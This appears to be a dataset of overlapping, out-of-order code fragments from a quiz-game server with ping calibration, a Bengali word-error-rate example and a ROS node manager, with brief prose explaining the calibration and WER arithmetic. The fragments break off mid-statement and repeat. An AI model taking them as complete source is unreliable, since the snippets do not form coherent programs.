"id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state",
"a ping: \", ping1 * 1000, \" ms\") self.ping_difference = ping0 - ping1",
"self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:]",
"import sys import random import uuid import time sys.path.append('..') from game import Game,",
"< self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn = id self.notify_players() #",
"-self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) /",
"duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or"
] |
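The calibration records above implement an NTP-style clock sync: each of the ten calibration messages stores `server_send`, the client echoes back its receive and send times, and the server stamps `server_rec`; `update_time_difference` then averages a one-way delay (`ping`) and a clock offset (`delta`) over the last six samples. A minimal standalone sketch of that arithmetic, with made-up timestamp values (the `t0`..`t3` names are illustrative, not from the original):

# NTP-style estimate behind update_time_difference(), for a single exchange.
# t0 = server_send, t1 = client_rec, t2 = client_send, t3 = server_rec
# (all in seconds; the values below are hypothetical).
t0, t1, t2, t3 = 100.000, 100.060, 100.061, 100.021

# One-way delay: half of the round trip, excluding the client's processing time.
ping = ((t1 - t0) + (t3 - t2)) / 2      # -> 0.010 s, i.e. 10 ms

# Offset of the client clock relative to the server clock.
delta = ((t1 - t0) - (t3 - t2)) / 2     # -> 0.050 s, client is 50 ms ahead

# The game then compares the two clients against each other:
# ts_difference = delta0 - delta1 and ping_difference = ping0 - ping1.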
[
"সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error = wer(ground_truth,",
"= \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\"",
"খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error =",
"from jiwer import wer ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis =",
"jiwer import wer ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার",
"\"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error",
"import wer ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে",
"দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error = wer(ground_truth, hypothesis)",
"wer ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা",
"পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error = wer(ground_truth, hypothesis) error",
"ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে"
] |
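For this sentence pair the hypothesis substitutes one word (খাদে for খাদি) out of five reference words, so `wer` returns 1/5 = 0.2. The same number falls out of a hand-rolled word-level edit distance; the helper below is an illustrative sketch, not part of jiwer:

# Word-level WER as token edit distance, for comparison with jiwer's result.
def word_error_rate(reference, hypothesis):
    ref, hyp = reference.split(), hypothesis.split()
    # dp[i][j] = edit distance between ref[:i] and hyp[:j]
    dp = [[0] * (len(hyp) + 1) for _ in range(len(ref) + 1)]
    for i in range(len(ref) + 1):
        dp[i][0] = i
    for j in range(len(hyp) + 1):
        dp[0][j] = j
    for i in range(1, len(ref) + 1):
        for j in range(1, len(hyp) + 1):
            cost = 0 if ref[i - 1] == hyp[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,        # deletion
                           dp[i][j - 1] + 1,        # insertion
                           dp[i - 1][j - 1] + cost) # substitution / match
    return dp[len(ref)][len(hyp)] / len(ref)

# One substitution over five reference words:
# word_error_rate("কুমিল্লার খাদি সারা দেশে পরিচিত",
#                 "কুমিল্লার খাদে সারা দেশে পরিচিত") == 0.2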
[
"node): result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max')",
"node to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param]",
"respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] =",
"= rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service",
"def runNode(self, node, autostart=False): ''' Start the node with given name from the",
"= descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter",
"C{dict(node name : [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr = ('',",
"or an empty string, if the C{file} is an absolute path @type package:",
"item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name))",
"False for f in afilter: if a.startswith(f): in_filter = True break if ':='",
"All rights reserved. # # Redistribution and use in source and binary forms,",
"parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple",
"the same name found in the package, the first one will be tacked.",
"= ns cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description =",
"% topic) topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except:",
"in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def",
"the parameter group parameter found, assign node to the group if not cap_ns:",
"launch file @type path: C{str} @param package: the package containing the launch file",
"@param node: the name of the node @type node: C{str} @raise StartException: if",
"capabilities description # use two separate loops, to create the description list first",
"roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not None and not item.machine_name",
"rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables are found! The",
"ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from",
"with self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if",
"system default coding to unicode. @param val: the string coding as system default",
"DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;",
"class StartException(Exception): ''' The exception throwing while run a node containing in the",
"LF (Line Feed) and decode the string entry from system default coding to",
"for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n",
"* Redistributions of source code must retain the above copyright # notice, this",
"str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ)",
"'ENV']: del new_env[k] except: pass # add node environment parameter for k, v",
"# with the distribution. # * Neither the name of Fraunhofer nor the",
"return result def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and C{capability_group}",
"'%s as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from",
"a new configuration. ''' self.listService = None '''@ivar: The service will be created",
"%s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv =",
"item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is",
"%d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None try: cmd",
"# self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return [] def rosservice_description(self,",
"config') self.runService = None if self.listService is not None: self.listService.shutdown('reload config') self.listService =",
"# self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return []",
"ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid 'defunct' processes",
"for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove",
"depending on ROS distribution API. @return: ROS master URI @rtype: C{str} ''' try:",
"self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) !=",
"PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS",
"def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req): # ''' #",
"return # env = n.env_args prefix = n.launch_prefix if n.launch_prefix is not None",
"rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import",
"string coding as system default @type val: str @return: the decoded string @rtype:",
"self.runService = None '''@ivar: The service will be created on each load of",
"description: C{dict(node name : [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr =",
"will be tacked. @param path: the file name of the launch file @type",
"groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns = cap_ns #",
"OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR",
"= '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic",
"= subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid 'defunct' processes thread",
"% n.namespace, '__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd)",
"raise StartException(str(e)) # handle different result types str or array of string if",
"capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes':",
"new configuration. ''' self.description_response = ListDescriptionResponse() # variables to print the pending autostart",
"conditions and the following # disclaimer in the documentation and/or other materials provided",
"verbose=False, argv=argv) # create the list with node names for item in self.roscfg.nodes:",
"val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self):",
"'' dr.robot_descr = '' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value,",
"from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required",
"a node containing in the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self):",
"try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node,",
"this list of conditions and the following disclaimer. # * Redistributions in binary",
"= rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes)",
"'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart",
"determine the current working path, Default: the package of the node cwd =",
"p.key, p.value) r = param_server_multi() for code, msg, _ in r: if code",
"> 0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type',",
"load the launchfile info local namespace sys.argv = list(argv) # set the global",
"if a.startswith(f): in_filter = True break if ':=' not in a or in_filter:",
"unify clear params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r",
"self._pending_starts.remove(node) except: pass # print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts:",
"ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch",
"if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid",
"# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO,",
"cwd, env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) #",
"argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a in",
"n.env_args prefix = n.launch_prefix if n.launch_prefix is not None else '' args =",
"= (str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd is None or",
"import sys import threading from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception):",
"machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current working path,",
"# skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return #",
"LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND",
"import subprocess import sys import threading from .screen_handler import ScreenHandler # , ScreenHandlerException",
"config') self.listService = None self.nodes = [] # the name of nodes with",
"params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start the node",
"cap_ns # add new group in the namespace of the node if ns",
"[%s] not found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name =",
"one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False):",
"parameter into ROS parameter server. ''' params = dict() for param, value in",
"0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay =",
"the given package. If more then one launch file with the same name",
"USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY",
"self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return [] def rosservice_description(self, req):",
"the '\\\\n' by LF (Line Feed) and decode the string entry from system",
"the ROS_NAMESPACE environment is used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE']",
"above copyright # notice, this list of conditions and the following disclaimer. #",
"n.launch_prefix is not None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' %",
"msg, _ in r: if code != 1: raise StartException(\"Failed to set parameter:",
"list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter server if self.load_params_at_start: self.loadParams()",
"= True break if not start_now: # Start the timer for waiting for",
"args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and autostart and start_delay >",
"0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime')",
"item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n =",
"permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS",
"entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] ==",
"= rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now =",
"not None: self.listService.shutdown('reload config') self.listService = None self.nodes = [] # the name",
"dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))} ''' result = dict()",
"else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname #",
"# add node environment parameter for k, v in n.env_args: new_env[k] = v",
"rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is None:",
"rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" %",
"or promote products derived # from this software without specific prior written permission.",
"elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self,",
"EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE",
"the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d:",
"r = param_server_multi() # for code, msg, _ in r: # if code",
"node, autostart=False): ''' Start the node with given name from the currently loaded",
"rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart",
"''' result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return",
"to the group if not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group'",
"try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces",
"plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter",
"file in the given package. If more then one launch file with the",
"= False for f in afilter: if a.startswith(f): in_filter = True break if",
"found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is",
"self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc() if self.do_autostart: if not",
"str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay",
"configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' :",
"the ROS HOME path depending on ROS distribution API. @return: ROS HOME path",
"spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code,",
"print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self,",
"'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try: for k in ['BASH_ENV',",
"URI depending on ROS distribution API. @return: ROS master URI @rtype: C{str} '''",
"self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded =",
"for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node environment",
"to print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def",
"rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import",
"'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master URI depending",
"and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else:",
"get_ros_home(self): ''' Returns the ROS HOME path depending on ROS distribution API. @return:",
"code must retain the above copyright # notice, this list of conditions and",
"is given, try first to find the launch file in the given package.",
"= types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd] if",
"cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added:",
"if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format,",
"roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import",
"self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list):",
"False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability group",
"parameter for k, v in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment",
"OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY,",
"the 'capability_group' parameter found, assign node to the group if cap_param in self.roscfg.params",
"current description. ''' return self.description_response def loadParams(self): ''' Loads all parameter into ROS",
"CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL",
"pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list with names",
"in master.getPublishedTopics(''): if start_required == topic: start_now = True break if not start_now:",
"executables are found! The first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self,",
"master.getPublishedTopics(''): if start_required == topic: start_now = True break if not start_now: #",
"launch_file raise LoadException('File %s in package [%s] not found!' % (path, package)) def",
"node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def",
"list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the",
"node to the group if not cap_ns: cap_ns = roslib.names.SEP # if the",
"to endorse or promote products derived # from this software without specific prior",
"get the capabilities description # use two separate loops, to create the description",
"Start the node with given name from the currently loaded configuration. @param node:",
"delay_service_creation=0.): ''' Load the launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown",
"name, sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description as",
"cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result:",
"then one launch file with the same name found in the package, the",
"other materials provided # with the distribution. # * Neither the name of",
"started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now",
"string if sys.version_info[0] <= 2: import types string_types = types.StringTypes else: string_types =",
"rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy import shlex import std_srvs.srv",
"names for item in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine",
"# get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items():",
"except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): '''",
"threading from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception",
"self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except:",
"== node: n = item break if n is None: raise StartException(\"Node '%s'",
"in_filter = True break if ':=' not in a or in_filter: continue result.append(a)",
"= None self.nodes = [] # the name of nodes with namespace self.sensors",
"# * Redistributions of source code must retain the above copyright # notice,",
"pass # print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts)",
"['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node environment parameter for k,",
"xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None",
"param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc param_server_multi =",
"import roslib.network import rospy import shlex import std_srvs.srv import subprocess import sys import",
"capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description':",
"group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes'])",
"list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with node names for",
"!= 1: raise StartException(\"Failed to set parameter: %s\" % (msg)) except Exception: raise",
"self.description_response def loadParams(self): ''' Loads all parameter into ROS parameter server. ''' params",
"= int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns the ROS HOME",
"# env = n.env_args prefix = n.launch_prefix if n.launch_prefix is not None else",
"return result def _masteruri_from_ros(self): ''' Returns the master URI depending on ROS distribution",
"and 'ENV' from environment new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']:",
"> 1: raise StartException('Multiple executables are found! The first one was started! Exceutables:\\n%s'",
"code, msg, _ in r: if code != 1: raise StartException(\"Failed to set",
"start_now and autostart and start_delay > 0: start_now = False # start timer",
"None: raise StartException(\"Node '%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)):",
"= path # if package is set, try to find the launch file",
"the documentation and/or other materials provided # with the distribution. # * Neither",
"StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle different result types str",
"If package is given, try first to find the launch file in the",
"from environment new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k]",
"len(cmd) > 1: raise StartException('Multiple executables are found! The first one was started!",
"rosservice_list_nodes(self, req): ''' Callback for the ROS service to get the list with",
"if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response",
"the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name",
"Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from",
"<NAME> # All rights reserved. # # Redistribution and use in source and",
"= int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] =",
"[''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables",
"self._get_start_required(node) if autostart and start_required: start_now = False # get published topics from",
"# shutdown the services to inform the caller about a new configuration. if",
"= False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" %",
"except Exception as e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart =",
"reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as it",
"(c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. # # Redistribution and",
"Redistribution and use in source and binary forms, with or without # modification,",
"if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list,",
"cwd=cwd, env=env) # wait for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait)",
"self.roscfg is not None: # get the capabilities description # use two separate",
"created on each load of a launch file to inform the caller about",
"cmd = self._get_node(n.package, n.type) # determine the current working path, Default: the package",
"if sys.version_info[0] <= 2: import types string_types = types.StringTypes else: string_types = (str,)",
"if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes,",
"not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False)",
"e) self.do_autostart = False def _decode(self, val): ''' Replaces the '\\\\n' by LF",
"os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy import shlex",
"assign node to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p =",
"self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK to let the node_manager",
"the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS services #",
"return topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay': 0}",
"new configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService = None if",
"Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback",
"descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter server",
"notice, this list of conditions and the following disclaimer. # * Redistributions in",
"LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,",
"loaded configuration. @param node: the name of the node @type node: C{str} @raise",
"= [] for a in argv: in_filter = False for f in afilter:",
"# initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty,",
"n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return",
"self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig()",
"for code, msg, _ in r: if code != 1: raise StartException(\"Failed to",
"rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will",
"== 0: raise StartException('%s in package [%s] not found!' % (filename, pkg)) return",
"self.listService = None '''@ivar: The service will be created on each load of",
"n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if",
"The service will be created on each load of a launch file to",
"PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS;",
"not start_now: # Start the timer for waiting for the topic start_timer =",
"parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p",
"if not self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes: itemname =",
"for C{capabilities} and C{capability_group} parameter and creates dictionary for grouping the nodes. @return:",
"given, try first to find the launch file in the given package. If",
"start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid 'defunct'",
"dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr = '' for",
"self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False)",
"result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if ns == cap_ns and",
"result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] =",
"item.machine_name if item.machine_name is not None and not item.machine_name == 'localhost' else ''",
"if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 5:",
